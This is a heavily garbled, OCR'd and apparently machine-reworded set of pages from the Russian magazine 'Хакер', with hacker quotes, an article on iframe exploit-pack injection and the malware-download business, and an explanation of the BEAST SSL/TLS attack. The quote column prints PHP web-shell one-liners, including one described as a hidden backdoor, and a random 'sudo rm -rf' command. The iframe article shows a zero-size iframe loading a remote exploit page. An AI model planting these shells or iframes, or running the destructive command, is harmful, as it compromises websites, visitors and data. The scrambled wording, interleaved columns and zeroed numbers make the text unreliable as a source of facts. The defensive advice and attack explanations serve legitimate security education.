мной, а п отратить некоторое доля денег равно сил н а поиски равным образом по­

травля соответственно социальным закла д кам. Список сервисов со ц иальных закладок

для у пку вместе с пециальн по части заточенного почти сие занятие софта. Деньги вернутся

позволено ухватить из получай ш его диска. П ости т ь ручной п касательно закладкам может

для те б е от торицей

066

:1. :::;: ХАКЕР

01 /15 0/201 0


rakernelpool: Атаки со указателем квоты

Счастливого

пула поуже безвыгодный работают во

ния

Windows 0. Указатель про­

IE6.

0О-го дня рожде­

Это странно, беспричинно как бы

питаться безграмотный приближенно бесчисленно

0О-летних

цесса поКСОРен со случайным значением

стариков, вокруг, которым твоя милость желал смер­

[ nt! Ехр PooiQuotaCookiel.

ти покамест

0 планирование

отступать ..

0!1!1

Комментарий:

Закон обмана: контингент раз­

liiil

Переполнения пула неграмотный везет на вось­

дуваемой информации об уяз­

мерке. Кому пожалуйста в качестве кого но зто работа­

вимости вплоть до релиза ее деталей,

ло, советую окинуть взглядом презентацию [ Ьit.

Внимание: вас далеко не потребно состоять

ly/qiWгtS I.

'анонимусами', зачем бы присутствовать

инверсно соразмерно реальной угрозе.

raanonymouSabu:

Анонимусами . Не бойтесь выка­ зывать поддержку идее.

raox6D6172696F:

rathegrugq:

Хороший мелкий РНР

Я поддерживаю

шелл из http://h.ackack.net/tiny-

disclosuгe, в некоторых случаях твоя милость сообща­

selective

php-shell.html //<?=[$_=!а$_ GEТ[2]J.Ia$_[$_GEТ[1]1?> Почти no-alnum.

работе твоему эксплойту. <<Исправьте зто [и

Почти .

в таком разе ваш покорнейший слуга получу гооt]>>

raanton_chuvakin:

ешь об баге, тот или иной мешает

Боже, неравно твоя милость существуешь,

пожалуйста, никак не позволяй им создавать новую технологию

APS -

0!1!1

liiil

<<АРТ Pгevention

System>>

Комментарий:

Типа «скрытый» шелл . Можно юзать

на правах бэкдор. Идея во том, что:

rachrisrohlf:

<? $vаг1="system"; $vaг2="diг";

Когда моя особа впервинку слышал оборона

$vаг1 [$vаг21;?> . Тогда понятно, что-то данный шелл требуется юзать так:

http://localhost/shell.php?1=diг&2=system Символ

ra используется про скрытия оши­

борт во логах об отсутствиие индексов

0и 0

на запросе [то, аюшки? следует с целью бэкдора, ведь,

{NX, DEP, SafeSEH, SEHOP, ASLR, RELRO, SmaгtPtгs, Safelnt, /GS, Неар Cookies, Uпliпk Checks Л'd fn ptгs, Reoгdeгed Vaгs, SDL, Saпdboxes}, мы думал, что такое? ошибки memory

razeminlu: Русская лента во UNIX: sudo [ $[ $RANDOM% 0]==О] && гm -гf 0 01 echo "You live"

соггuрtiоп мертвы.

правильнее всего, легитимные требования будут

Единственное а решение- за глаза

laDidierStevens:

шествовать сверх сих брат метров!. Итого - <?php

багов вообще. Это вновь неграмотный результат :1

Хорошие новости. Потестил ваш покорнейший слуга

[$_="system"l.$_["diг"l;?>.

nсевдо

ASLR на ЕМЕТ'е не без; вклю«bottom up

ченной опцией

гandomization>>. Оказывается псевдо-АSLR

radakami:

приближенно а хорош, во вкусе равно действительный

ASLR.

«Я прежде думал, ась? вторая вселенная это У меня такие а проблемы не без;

LDAP,

наравне из

самый знаменательный приорат во

S во SNMP

моем теле. Затем ваш покорнейший слуга осознал, кто мне зто говорит>>.

Комментарий:

В отзыв в взламывание kenel.oгg,

0!1!1

Комментарий:

Pгotocol

liiil

Дэн Камински цитирует Эм по части

SNMP=Simple Netwoгk Management

Филлипса [американский ломака ... !

LDAP=Lightweight Diгectory Access

ra

SecuгeTips рекомендует заnу­ скать серверы во гunlevel

0,

с тем чтобы

избежать бэкдоров во гсЗ.d скриптах.

Pгotocol Лопата.

ХАКЕР

01 054/ 011

067


хакинг

So Better

НА ЧЕМ ЗАРАБАТЫВАЮТ ВОРОТИЛЫ БИЗНЕСА ЗАГРУЗОК

за и нападени Если твоя милость никак не вращаешься в определенных кругах, так едва ли

ли знаешь что до том, каким образом

Вся новость

l fгame, alias nлавающий фрейм,- сие порознь взятый форменный НТМL­

nредоставлена

документ, тот или другой сообща вместе с другим содержимым равно другими фреймами

как никогда в ознакомительных

может существовать отображен на любом месте веб-страницы. Проще говоря, этоттег

связаны посреди собою понятки

целях . Ни редакция,

nозволяет мудрить общностный сайт в глубине сайта. Есть двойка основных <<черных>>

ни творец безвыгодный несут

ifгame, траф равным образом загрузки . Однако,

ответственности после

метода исnользования сего бери nервый мнение безобидного тега:

неравно тебе взять хоть крат во жизни

произвольный возможный вред, nричиненный материалами данной

встречался SМS-блокер тож

статьи .

0. Атаки в комnьютеры обычных nользователей nри nомощи таково назы­ ваемых эксnлойт- nаков . Айфрейм возвышенно nодходит пользу кого сих целей, ведь до сей времени nроисходит за кулисами ото юзера;

0. Н акрутка всевозможных счетчиков nосещений, для nрим еру.

твой мейл оказался завален

Livelnteгnet или — или Яндекс . Метрика.

спамом, ведь знай- твоя милость попался

В данной статье автор будем полагать особенно nервый метод.

на лапы ко нехорошим людям,

Схема его исnользования кончено nроста:

которые во своем теневом

0. 2.

бизнесе оперируют в духе раз этими словами.

Покуnается иначе nишется эксnлойт-nак; Покуnается alias арендуется антиабузный хостинг с целью установки эксnлоит- nака ;

0.

lfгаmе-код сего экс nлойт-nака вставляется возьми равно как позволено большее количество НТМL-страниц;

0. Уязвимые браузеры n осетителей сих страни ц nробиваются вместе с n омо­ щью эксnлойтов изо nа ка;

068

ХАКЕР

01/154/ 0011


lfгame: оборона равным образом приступ

~~

- - -- - -- - - - -

------~

--

СТАТИСТИКА

Осtюsные Бvtый сткок Вс:троенные ~eiCfbl BнtWH IIЙ I"A YI~OМI'IViИII ДonoлниrUII>ItO Доnолннrепьные оrран~о~ чения ААА нем,р.еж.tы~~; с111йтое

ЗА ВЕСЬ ПЕРИОД

При~t ~ltЩе\ К.ШtНЬI I'tЫС t1 0стрОЙО! ltтyneJOT 0J СЩ 01116о Hl НО IОЙ CТJI~ HIЩt, либо МОU\11! o6нOIJi et1 И.II tиyute\i CJPIHIЩЫ (1ручwу10)

(i} Зtnрmнь <AUOIO> 0 <VIDEO>

0

З111nретмn. оrображен ие ~еа.tекто• M~eromedi tФ F11mC!I

0

Зtnp e~ отображенке )lltt.teнтo• <IF RAME>

gj

Звnретмn. oтoбputtt~иe 'ntмtmol Microsofte Silllv!ight""

0::}

Зanp enm. отобрц:ен ке )1\tм~о• < F RAМES>

fi]

З1npenm. отобрuсttше )lltмtктoa друrмх м1mноа

li) Зanpenm. Ofont-ftce

0160 ХИТЫ

[J При ..еtU~ть ""' огрмtиченмя м д.пао~.оверенным айто•

ЗА СЕГОДНЯ

({} 0JIOirnj)OIIП.IIto6oЙ ~ЫICI" С IIЦOIЦ'tti11ЬIX CIЙYOI

0160 хиты

bll

BЬ!ДeJUtn> uбпоmроа•нные :t.nементы '"' чком вместе с pil.l~toй

Е) Не on.tNIHo o6~tltТЫ, '(ОТО~ p•<ПOIIOJt:tHЫ Hl HtHIДOCitblX СIЙТIХ

I1J lJ

ПодтаержА~ть аременкую puбlюкttpolкy O~el("fl Hl страt~нце Cto~ч1111n. ябпок11роttн"ые oб"tiCfbl

062 хосты

04 ЗАГРУЗКИ 0it

062 хосты

04 0дГРУ31<И -

ПРОБИВ

0.46% ПРОБИВ

• Статистика одной с действующих связок эксплойтов

CINrCiick-saщип Кll страннцu_

li} недоаерен ньа

{i] АО1tренных

0.

Дорвеи.

Дорвеи- сие сайты, которые никак не несут неважнецкий полезной инфор· мации интересах обычного пользователя . Создают их про привлечения трафика вместе с поисковых систем получи партнерские сайты, которые

NoScript на Firefox

только и знает являются простым равно обманками. Например, на случае с СМС-платниками читатель далеко не получает ни ложки в обмен по прошествии

0. 6.

отправки одной иначе говоря нескольких см с. Подобные сайты легко и просто могут

К посетителю тихо грузится частный софт

[отсюда беретик свое зачин континуум <<загрузки>>];

применяться ради распространения вирусов равно тому п одобного

Взятый перед точный надзор нотбук сего посетителя ис­

добра. Все чаще их создают получай взломанных сайтах, что-то около называе­

пользуется в целях совершения каких-либонезаконных действий

и, на конечном счете, интересах заработка .

мом «ЛОМе».

0. SEO,

белые ресурсы.

Злоумышленники и могут сложить равно хорошие сайты вместе с хоро­ шим контентом равным образом приятным дизайном. Такие сайты продвиг аются

Чисто технически по сию пору довольно-таки понятно, только остается вопрос:

каким образом злоумышленники получают п осетителей [траф] получи и распишись

на поисковы х вместе с истемах, а а там имеют кайфовый всякие интересные места

з араженные страницы?

своих пользователей из через совершенно тех но айфреймов. К счастью, сами поисковики равно как безвыгодный дремлют, равно такие сайты частенько

ИСТОЧНИКИ ТРАФА

награждаются табличкой из предупреждением что касается возможной опас­

В бизнесе загрузок существует огромное контингент не без; п особов для привлечения трафика. Притворимся инсайдерами равно рассмотрим

однако сти .

0.

Спам . Очевидно, ась? стереотипный сп а м равно как являются распространителем

самые основные изо них.

вредоносных программ. Часто образец вставляется сверху редиректы.

0.

Редиректы- сие орудие к перенаправления поль зователя

Покупка.

Купить- это, пожалуй, самый вразумительный способ. Туту злоумышлен­

держи нужную страницу alias ущелье т. Злоумышленники неоднократно используют

ников лакомиться до некоторой степени вариантов: пок у пка вместе с рук возьми всевозможных

уязвимости на сайтах ради того, ради основать сверху них редирект. Та­

хакерских форумах иначе говоря купля держи специализирова нны х биржах

ким образом, человек, пере ходящей нате известный сайт, попадает во

SЕО-трафика. Многие форумы прямо-таки кишаттемами по отношению продаже

лапы вредителей. Тем самым убиваются за единый вздох двушник зайца: куверта

трафика : <<Продам

US, UK, AU>>

попадаетнан ужныйсайтиподвергаетсяатакесвязоксплойтов.

иначе << Продам м незнакомец 000к >>. Это равным образом

вкушать те самые топики, идеже злоумышленники покупают поль­

Также на рассылках может быть, скажем, Wогd-файл от заманчивым

зователейдлясвоихзловредныхдействий.Од накоестьодно

названием, идеже в свою очередь присутствуетссылка в вредоносный сайт. Или

<<НО>>- справить по-всамделишному благонравный движение без малого

человека без затей просятскачать файл, который, на правах твоя милость понимаешь,

невозможно, вследствие чего сколько продавцы во ведущий массе используют

является вредоносным. Самое удивительное, чтотакие просьбы

его сами, а продают на того, в надежде произвести в большинстве случаев выгоды.

составляются специалистами на области НЛП равным образом социаль утнапиштим инжене­

Или а сбыт изначально по рукам на большое величина рук, ведь

рии, равно Юзеф ер то и знай самовластно со качает да запустит какой угодно сердито вред.

естьзлоумышленник у предпринять копейка для этом трафике будет тяжелее, в такой мере ка ко отдельный свежеиспеченный соответственно купатель может сделаться его конкурентом.Увы,покупаятрафиксоспециализированных

П осле обзора источников трафа у тебя несомненно возник покамест паче

бирж, да неграмотный стоитрассчитывать возьми чекан трафика. Почти

занятный вопрос: а дьяволом а наполнять сии вирусы равно другие вреда­

огулом некто состоит с б от в, которые, наравне твоя милость понима ешь, ни получай который

носы? Давай копнем сызнова маленечко глубже равным образом как получится бери то, бери нежели

безвыгодный годятся. Но изменение безвыгодный достаточно получи и распишись месте: на последн ее миг

злоумышленники получают нажива во описываемом бизнесе.

стали показывать вместе с пециали зированные биржи на правах единовременно ради таких

черных дел. Многие недобросовестные вебмастеры равно владельцы

0.

сайтов предумышленно продаютсвой затор туда, зная, гораздо некто изволь

0.

Фейковыеантивирусы. Твой переанальный принтсервер подвергает ся заражению, равно у тебя,

равным образом что-нибудь может сотвориться вместе с пользователями .

на правах по мнению мановению волшебной палочки, п оявляется антивирус,

Шеллы, фтп, накануне ступы, админки .

добро бы твоя милость ничто да вовек безграмотный устанавливал. Он во огромных количе­

На тех а самых форумах издревле отыщется огромное контингент

ствах находит вирусы, считается заразившие твои файлы. Для того

объявлений в отношении продажетак называемых шеллов, фтп, доступа на да

дабы вернуть ко жизни совершенно сие непотребство, те бе предлагается оторвать

админок. Это, равно как правило, взломанные сайты, со которых пират

полную версию а нтивир уса, которая имеет смысл больше

хочет нахватать прибыль, продав для ним доступ. Злоумышленники

Человек, вслед за гр узив ший этотантивирус натвой компьютер, получит

000 долларов.

общепринято используют их чтобы рассылки спама, создания дорвеев

комиссионное вознаграждение от каждой экой продажи. А ты- ничего, вдобавок со­

да в целях того, с тем поставитые самые айфреймы держи домашние связки .

жаления в рассуждении потраченных средствах .

Иногда бывает даже, что такое? поперед боли наслышанный сайт становится

0.

Подмена выдачи.

вредоносным. Время излечения через заражения зависитуже через

Этот лицо вреданоса больше дружелюбен ко п ользователю, беспричинно

администраторатакогосайта.

вроде ведетон себя оченьтихо равным образом п в отношении купать сносно безграмотный просит. Эта

ХАКЕР

01 / 054/2 011

069


хакинг

И Н ЖЕКТЫ И АВТОЗАЛ И ВЫ

КАК ЗАЩИТИТЬСЯ ОТ АТАК ЧЕРЕЗ IFRAME

Инжект ы - эт насчёт на недрение что до п ре д е л енного ко д а во б р аузеры !прямо как плагиныl чтобы анализа каких-либо полей равно непохожий дополнительной информации п ользователя . Чтобы кризис миновал уяснить , зафигом они нужны,

Теперь, нет-нет да и твоя милость оправился с ужаса всего делов написанного выше,

предлагаю перетереть неболь ш ой пример. Для того дай тебе надыбить

мы хочу раструбить тебе относительно защите ото айфреймов. Как говорится,

финансы со счета, злоумышленнику нужно пробовать отдельные люди допол­

спасание утопающего- деятельность рук самого утопающего. Итак, принимать

нительные факты !кодовое слово, девичьи дом матери равно т.д.).

серия инструментов :

Взять их слыхать бы неоткуда, в дополнение на правах у самого пользователя. Но не спрашивать но их напрямую? На самом деле мшкно, же хитрожопо -так,

0. Антивирусы .

с целью дьявол далеко не заметил подвоха. Для сего прощелыга может превратиться для

Самым простым способом защиты является, натурально же, антивирус,

зло-кодерам, которые да пишут сии самые инжекты. Обычно их создают

который-нибудь полноте отводить атаки нате твой пэвм не без; круглым счетом

предумышленно около форма сайта, вместе с которого ужотко бросьте вымогаться

называемых << грязных сплоитов >> . Грязные сплоиты- сие сплойт­

катамнез !например, странички онлайн-банкинга). У человека быть

снова , которые в бывалошное время сейчас были обнаружены антивирусными

заходе на собственный аккаунт сверху банковском сайте неотъемлемо всплывает окно,

компаниями иначе говоря другими сервисами сиречь Ma l waгe Тгасkег'а .

которое запрашивает лично после этого равно теперь учредить дополнительные

Таким образом, быть атаке грязной связки антивирус сможет

данные. Ничего безграмотный мнящий ламер их вводит. Данные,

отразить нападение твой переанальный компьютер, в такой мере вроде сайт тож адрес связки

во свою караван , отправляются злоумышленнику, а тогда подле их по­

еще были занесены во базы обновлений.

скелет равно совершается обкрадывание средств.

0. Плагины .

Аз- сие автозалив щ ик. П относительно сути сие случай троя сверху , которая

Злоумышленники- человечество поодаль далеко не глупые равно едва ли ли станут сохранять

позволяет минус участия оператора !владельца ботнета) автоматиче­

близкий софт во <<грязном >> состоя н ии, потому-то автор сих строк н е буд ем н а

ски исполнять заливка !перевод денеж н ых средств не без; банковского

считать н а антивирусы равно постараемся после щ да т ить свою машинку

эккаунта жертвы) нанекоторого наперед обозначенного дропа. К

сами. Так во вкусе большая пакет атак нацелена бери плагины IAdobe Flash

примеру, автозалив может выполняться во момент, в некоторых случаях сверхжертва

Рlауег, Java, Adobe Readeг) , советую тебе легко устранить их . Хоть

заходит нате страничку своего онлайн-банкинга.

сие равным образом невыгодный жуть удобно, зато в наибольшей степени безопасно, так-таки во плагинах

000%

приземленно изо дня вдень обнаруживают какие-либо дырки . Отдельного упоминания требует Java, таково в качестве кого на ней находится большая дробь уязвимостей. Ее во л юбом случае л учше вык л ючить, потому который получай скольжение вИнтер н етеэто казаться безвыгодный повлияет.

З . Обновления. Не бесполезно производители программ завсегда пытаются вставить во что

дозволено большее количе не без; тво мест сии надоедливые механизмы обновлений. П омнишь, во детстве вечно заставляли положения риз невкусные лекарства? Тут сполна приблизительно же. Эти <<лекарства >> вроде присест и устраняют всё-таки уязвимости, котор ы ми где-то по собственному побуждению пользуются злоумышленники .

0,. Блокеры lframe·мoв. Блокеры фреймов- сие лучшее резолюция ради тех, кто такой невыгодный привык к << неполноценному >> Интернету. Нехитрое выходка в соответствии с блокированию

фрейма вплоть до того, по образу дьявол открылся, на п олне да что такое? ты ц е н только сможет уберечь твой компью т ер ото заражения . Многие

<< No Аds >> -дополнения имеют во своем арсенале такую функцию,

как бы срывание lfгаmе'мов, получи и распишись п ример, NoScгipt l noscгipt . net ) . Для включения функции блокирования фреймов заходи во <<Инструменты

0 Дополнения >>, в рассуждении сего заходи на опции NoScгipt ' a, открывай вкладку << Piugins>> равным образом ставь галочку возьми п ротив << FoгЬid <IFRAME»>.

0. JavaScript. Этот коренной сnособ и поможет избежать заражения, т. к. криптеванный образец прямо-таки н е сможет сработать. Однако неграмотный смогут

трудиться равным образом прозопальгия ш инство современных сайтов :). Так alias иначе, имей в виду, ась? соответствующая конфиги глотать во настройках любого браузера.

С КАЖДЫМ ДНЕМ ПОЯВЛЯЕТСЯ ВСЕ БОЛЬШЕ НОВЫХ СПОСОБОВ КРАЖИ nровер ка х орошо ради ко риптованно й связк равным образом получай чистоган ичи е вирусов

070

ПЕРСОНАЛЬНЫХ ДАННЫХ ХАКЕР

01/154/2 011


lframe : щит равно штурм

зксплоиты

%ВСЕГО

%t

0

00.00

0

08.57

0

04.29

ХР

0

000.00

PDF LIBТIFF

0

0.14

08.57

FLASH > Java SMB

04.29

Java ОВЕ

00.00

-

ЗАГРУЗКИ

ЭКСПЛОII'IТЫ

Windows

0.14

v

Windooл•s ХР

000.00

х

Статистика соответственно эксплойтам на одной иэ связок

схема меняет рекламу да результаты поиска на Интернете для

r··..-lы npeдлaraet·l f:.Эr·r зарепктрtrров.эн.е:::J во наше1:1

PPI

партнеро~о1:1 nporpar-н·re.

Пр1rн1н-r.эеr-r адвертов ото :.оо 01нст.элов на с;,•тю1.

рекламу злоумышленников, которые получают не без; сего доход.

З.

Такой метод нормально используется какдополнительный дорога

Пл а т иl'"t:

заработка бери зараженных машинах.

Ценовt-rе \/СЛОЕ:Irя

Винnоки/Бnокираторы.

-

РеГ•/Л·::Jрно r·:plrnт·,,~er-rt.в'r е:~е.

-

Подробн.э:::~ онл.эr-1н стапкпи<а.

Самый недоброжелательный сноровка выжимаденег с загрузок. Специальная программа блокируетсистему равным образом проситсделать что-то, так чтобы твой

принтсервер был разблокирован. Сейчас ахти популярны предло­

::.эвrrсят через ~~-эцества ваши:: trнcтa.noE:.

- Гр··,"Зtнt.ся нr:~ий COi~H равно отнюдь не r-rewaeт р.эботе п~· to::epa. -Выплаты r·:а:·t~дый вторниr~ ~:а предыд1,rщ\'Ю неделю.

-

П 0е

ост.:шляеr.r свя=:~~~~.

жения от пополнением баланса сотового оператора во рокировка возьми код дляразблокировкинагипотетическомчеке.Послепополнения

телефона злоумышленника твоя милость никакого заключение никак не увидишь, равно твой

Н е на ы для уп ае~"< t :

0) 2)

[.·Jнсталы, нд·.,,.щие Е: нес~·:олt·~·:о p·Jiк

l··1нсталы вместе с порн·у-шны:.: са~~нов (адалт).

компьютертакиостанетсясокном,котороепроситпополнитьномер

мобильного телефона. Также ради ускорения получения денег равным образом пока что

Про из ьб а не без; р аза у у каз ы ва ть:

большего испуга пользователя злоумышленники используют над­

0) 2)

писи, которые гласят, сколько посредством некоторое период файлы от компьюте­ рабудутудалены,хотя,скореевсег~ничеготакогонепроизойдет

t..

Аккаунты с банков/Кредитные карты/

0=-'./ТОЧНЬIЙ 06Ъet•l f1НСТ.ЭЛО8. Проис::о:1:·дение инст.элов(теr·rапн<а).

nост в одном изо специализированных форумов

Другая личная информация. Все перечисленное вне является стержневой целью людей, которые

адрес [на практике твоя милость ой ли ли заметишь этакий код, приближенно в качестве кого нормально

по мнению ража надстройка вирусами компьютеры простых пользователей. На маши­

ifгame важнецки закриптован равно обфусцированl:

ну-ка попадает какой-либо граббер, например, ранее набившие оскомину всем антивирусным фирмам Zeus не в таком случае — не то SpyEye, после этотграббер ворует постоянно введенныеданные да отправляют их получи и распишись сервер, идеже

<iframe src="http ://s ite.ru / l . php" width="e" height="e" frameborder=" e" ></iframe>

злоумышленники анализируютих равно находят нужную им чтобы кражи

денег ан фу. С повышением грамотности пользователя равным образом развитием безопасности софта похищать такие способности отсюда следует сложней, а равно тене­

Здесь твоя милость можешь испытать ссылку site.гu/1.php да другие пара­ метры. Давай на первых порах пройдемся за два метрам:

крик производство невыгодный стоит только получи месте . С каждым средь бела дня появляется всегда больше новых способов кражи персональныхданных: ко примеру, инжекты равным образом

приблизительно называемые «аз>> программы (подробнее умереть и безграмотный встать врезке! .

0.

Ддос.

width="e" - ширина height="e" - высота frameborder="e" - убирает объем фрейма

Создание ботнетов на совершения DDоS-атак-это уж повсед­ невное дело. Чаще общей сложности владельцы ботнетов оказываютуслуги

0.

0.

Данный шифр скрывает подгружаемую ссылку, делая ее незаметной

за вымоганию денег не без; владельцев интернет-ресурсов лещадь угрозой

пользу кого глаза пользователя. По самой ссылке находится свясло не без; эксплой ­

ддос-атаки.

тами. Сначала определяется наружность браузера, существование плагинов да образец ОС,

Спам.

а спустя время пачка пытается <<пробить>> настоящий браузер всеми доступными

Ботнеты используютсядля рассылки спама. Самым известным был

методами. Эксплойты нормально берутся не без; багтреков или — или а покупают-

ботнет

ся на привате вслед п-ную сумму зеленых президентов. Если эксплойт

Rustock, тот или другой на близкие сливки Век Петра генерировал поперед 0

миллиардов писем на сутки.

сработал, в таком случае ко пользователю непроизвольно загрузится либо — либо самолично вирус,

Продажа.

либо специальная программа-лоадер, которая хорэ прожидать команды

Данное обрисовка было бы неполным не принимая во внимание упоминания такого при­

изо <<центра>> для загрузку определенного софта. Также овчинка выделки стоит отметить,

митивного способа получения нечистой прибыли, как бы простая

который на последнее промежуток времени появились такие связки, которые во случае не­

сбыт загрузок около определенные описанные меньше цели.

пробива пользователя используют ухватки социальной инженерии не без;

Люди создают огромные сервисы согласно загрузке вредоносных про­

просьбой в рассуждении загрузке вируса.

грамм для компьютеры пользователей равным образом зарабатывают получи и распишись этом незаконном бизнесе немалые финансы . Сегодня твоя милость узнал в отношении целом бизнесе, некоторый цветет равным образом пахнет секретно с

РЕАЛИЗА!JИЯ Я невыгодный буду описывать, вроде подсоединиться на описываемый бизнес, в такой мере в качестве кого

тебя. Теперь твоя милость знаешь, наравне застраховать себя с нежеланных <<гостей>>

бери своем компьютере равно в качестве кого малограмотный останавливаться обманутым. Хотя на способах за­

сие противно да противозаконно. Опишу всего только вкратце, как бы злоумыш­

щиты пишущий эти строки равно привел прописные истины, так архи многие п ренебрегают

ленники заражают страницы получи уязвимом сайте. Итак, допустим,

даже если ими . Я надеюсь, почто твоя милость намотаешь получи и распишись усище всю представленную

на НТМL-исходнике какого-либо ресурса твоя милость обнаружил нижеупомянутый

информацию равно безвыгодный позволишь злоумышленникам сколотить состояние возьми тебе. ::Х::

ХАКЕР

01 /154/ 0011

071


взламывание

Коллективный р аза разум

ПЕРВАЯ РАБОТАЮЩАЯ

АТАКА НА SSL/TLSПPOTOKOЛ Передаваемые в области SSL-соединению данные можно расшифровать! Для сего Джулиану

Риццо да Тай Дуонгу посчастливилось использовать недоработки во самом протоколе

SSL. И

пусть себе

тост нонче безвыгодный изволь по отношению полной дешифровке

трафика, разработанная ими обслуживающая программа

BEAST

может извлечь изо зашифрованного

потока то, в чем дело? представляет собой наибольший интерес,- секретные кукисы из

да дентификатором сессии пользователя .

ЧТО ТАКОЕ BEAST? 103 секу н ды потребовалось утилите

Всего

ВЕАSТ I B гowseг

Exp loit

Agaiпst SS L/Т L SI, воеже распутывать секретец н ую кукису на вхо д а во аккау нт

PayPal. П вышарить ви д еокас т м ож н по отношению н а Yo uTube IQiJ.bl omqAsQ J. Это н е фей к. Ж равным образом вая д емонст р а ц ия ути литы п ро ш ла на рамках конфе р е нц ии Ek opaг t y во Буэнос-Айросе, идеже равным образом ссле д по отношению на а те л равно выступили с докладом равно п оказа л равно корпящий pгoof-of-coпcept. Ис п ользуемая

у язвимость дейс т витель н по части позволяет неощутительно п ерехва т ывать дан­

ные, передаваемые в кругу веб - сервером равно браузером п ользователя. По иронии судьбы наступление эксплуа т ируе т отнюдь не какую-то новую найденную

на протоколе брешь, а незащищенность

SSL/TLS мол вместе с ятилетней давности ,

долгое момент считавшуюся во всей полноте теоретической. Н о, как бы говорится, раз на время равно дрюк вместе с т реляет, круглым счетом что-нибудь стрела-змея следовать цифра парение чувствительность согласно правилам

можетп ерей т иизразрядатеоре т ическихвов п ол несебепрактическую. Исслед ова тели временно безвыгодный п убликуют ут или — или т у, н в отношении -де л автор тся wh i tepapeг'oм

072

ХАКЕР

01 / 054/2011


BEAST:

касательно проделанной работе I Ьit. l y/oBLWHX ). Програ мма состоит с двух эле­

Ci ;

Е(Кеу,

смертный кража SSL-кукисов

Mi xor Ci-1)

ментов: снифера, что анализирует НТТРS-трафик, равным образом специального

агента, написанного получай JavaScгipt равным образом Java, каковой потребно существовать под­

Во миг шифрования первого блока первообразный шрифт ХОR'ится

гружен на браузере жертвы !для этого, ко примеру, никуда не денешься убедить

некоторым вектором инициализации llпitialization Vectoг, IV), некоторый

пользователя начинать страницу со нужным кодом) . Агент нужен к того,

заменяе т плод предыд ущего шифрования, которого по части понятной

дабы особым образом вводить сведения во оный но безобидный каналец

причине нет. Все довольн об просто. Однако сия толкование описывает

связи, что используется для того передачи секретных кукисов. Как сие

ситуацию ради одного большого объекта, таког о, например, на правах файл,

позволяет расшифровать данные? Вот в этом месте вступает века известная

какой усилий разбивается в блоки. В свою очередь, SSL/TLS явля­

незащищенность SSL 0 . 0/ТLS 0.0, возьми которой я остановимся подробнее .

ется крипто графическим протоколом- ему делать нечего кодировать

неграмотный отдель ный файл, а серию батман кетов. SSL/ТLS-соединение может

ОСОБЕННОСТИ ШИФРОВАНИЯ

SSL 0.0

Протокол SSL 0.0/TLS 0.0 позволяет проэксплуатировать зашифрование

бытийствовать использовано ради отправки серии НТТРS-запросов, отдельный

с которых может являться разбит бери сам либо — либо паче танцевальный шаг кетов, которые,

симметричным ключом, используя либо блочные, либо потоковые

на свою очере дь , могут состоять отправлены во процесс на правах нескольких

шифры . На практике, однако, естественным путем используется блочные шифры ,

секунд, что-то около равным образом нескольких минут. В данной ситуации принимать банан способа

да описываемая нами удар применима собственно интересах них. Чтобы вник­

пускать в дело нагрузка СВС:

нуть во суть, нужно славно представпять себя базовые понятия. Принцип работы блочного шифра заключается во отображении

приготовлять каждое известие во вкусе индивидуальный объект, генериро­ вать новомодный градиент инициализации равно запоминать соответственно описанной схеме.

блоков открытого текста во зашифрованные блоки того а размера.

возделывать постоянно сведения на правах так сказать они объединены на безраздельно

Проще сумме помыслить блоковый шифра на виде гигантской таблицы,

немаленький объект, сохраняя СВС-режим средь ними. Этого позволено до­

со держащей 0л128 записей, каждая изо которых заключает агрегат текста

стичь, используя на качестве вектора инициализации с целью сведения

М равным образом подходящий ему зашифрованный прибор С . Соответственно,

n крайний узел шифрования предыду щего сведения ln-1). Внимание, капитальный момент. Протокол SSL 0.0/TLS 0.0 использует

интересах каждого ключа шифрования хорошенького понемножку отдельная такая таблица. Далее я будем называть криптооперация на виде функции:

другой вариант, равно вот поэтому и есть на этом кроется способ про проведе­ ния атаки .

С

;

Е(Кеу,

М),

ПРЕ СКАЗУЕtv1ЫЙ ВЕКТОР ИНИ

~~;...;..;...;~=..;.~

ГдеМ-ис ходные данные, Кеу- кнопка шифрования, а С- по­

лученные зашифрованные данные.

Блоки имеют нищенский размер !как правило, 06 байт). Поэтому возникает вопрос: вроде длинное сообщение? Можно раз­

Атака строится для нескольких допущениях, хотя компетенция создателей

BEAST показал, сколько их в корне на практике провести в жизнь на реальной жиз­ ни. Первое допущение: преступник обязан обладать допустимость

снифать трафик, что переда ет браузер. Второе допущение:

атаковать депеша сверху блоки одинаковой длины !те но самые 06 байт) равным образом

бяка чувак каким-то образом обязан застави ть жертву пере­

первый попавшийся прибор на отдельности. Такой подходец называется

всучать информация до тому а самому безопасному каналу связи. Зачем

режимом бездействие замены IECB, Electгoпic codebook), однако используется

сие нужно? Рассмотрим случай, в некоторых случаях посреди компьютерами Боба равно

редко. На ведь принимать причина: разве ты да я будем зашифровывать банан одинако­

Эли из общепринято безопасное соеди нение . К нам попадает сообще­

вых согласно содержимому блока, в таком случае во результате да возьми выходе получим банан

ние, i-блок которого, на правах автор сих строк предполагаем, содержит, параль Элис

одинаковыхзашифрованныхблока.Этовлечетзасобойпроблему

!или секретную кукису- неважно). Обозначим зашифрованный узел

сохранения статистических особенностей исходного текста, которая

во вкусе Ci, созвучно Mi- ее движение роль. Напомню, зачем Ci; Е IKey, Mi

хоро шо продемонстрирована нате иллюстрации. Для избегания такого

хог Ci-1 ). Теперь предположим, сколько ее параль-это Р. Главная понятие

эффекта был разработан общественный порядок сцепления блоков шифротекста ICBC,

на том, что-нибудь ты да я можем ревизовать правильнесть нашего предположе ­

Cipheг-Ыock chaiпing), во котором произвольный ниженазванный содружество открытого

ния! Итак , автор сих строк знаем !так наравне смогли перехватить) градиент инициа­

текста ХОR'ится из предыдущим результатом шифрования:

лизации, тот или другой хорошенького понемножку применяться для того шифрования первого

ХАКЕР

01/154/2011

073


хакинг

Onc рьпый тексr Вектор ИНIIЦИалИЭЗЦIIИ

За1111фрооажый

Зашифрованный

Заwифроваииый

теr.ст

формулировка

подтекстовка

Принцип действ равным образом пишущий эти строки еве-шифра

ориг равно нальная битовая ко арта

блока следующего сведения . Это, соответственно, новейший прибор

ребус во режиме ЕСВ

предыдущего сведения [в зашифрованном виде)- обозначим его

IV.

Мы равным образом перехватили да знаем ценность блока , идущего накануне

Ci- табор н ачим его Ci-1. Эти причина нам ужас нужны. С их через

П робле м а р ежик има п ростой замены

наш брат особым образом формируем сведения так, с намерением основной блок если надежда неграмотный верное, равенства безграмотный будет. Так я можем

был равен следующему:

контролировать бери ш да предположения.

М1

=Ci-1 xor

IV xo r

Р.

